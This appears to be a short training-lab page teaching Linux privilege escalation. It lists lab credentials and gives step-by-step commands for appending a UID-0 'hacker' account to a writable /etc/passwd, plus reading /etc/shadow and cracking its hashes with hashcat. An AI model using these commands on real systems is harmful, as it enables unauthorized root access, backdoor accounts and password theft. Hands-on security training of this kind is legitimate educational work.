⚠️ Pracivo Security Lab — Linux privilege escalation techniques. Start as a low-privilege user and escalate to root.
Lab Credentials: ram / pracivo | alice / alice123 | root / toor (goal: escalate to this)
Writable /etc/passwd
PRIVILEGE ESCALATION
# Check if /etc/passwd is writable (misconfiguration)
ls -la /etc/passwd
# -rw-rw-r-- 1 root root /etc/passwd ← group-writable! exploit this
# /etc/passwd format:
# username:password:UID:GID:comment:home:shell
# If password field is 'x' → password is in /etc/shadow
# If password field has a hash → passwd itself is used (legacy)
# Step 1: Generate a password hash
openssl passwd -1 -salt xyz hacker123
# Output: $1$xyz$ABC123...
# Step 2: Add a root-level user directly to /etc/passwd
echo 'hacker:$1$xyz$ABC123...:0:0:root:/root:/bin/bash' >> /etc/passwd
# Step 3: Switch to the new root user
su hacker
# Password: hacker123
id
# uid=0(root) gid=0(root) — ROOT SHELL!
# Alternative: if /etc/shadow is readable
cat /etc/shadow
# root:$6$rounds=...hash...:18000:0:99999:7:::
# Crack with hashcat:
hashcat -m 1800 shadow_hashes.txt /usr/share/wordlists/rockyou.txt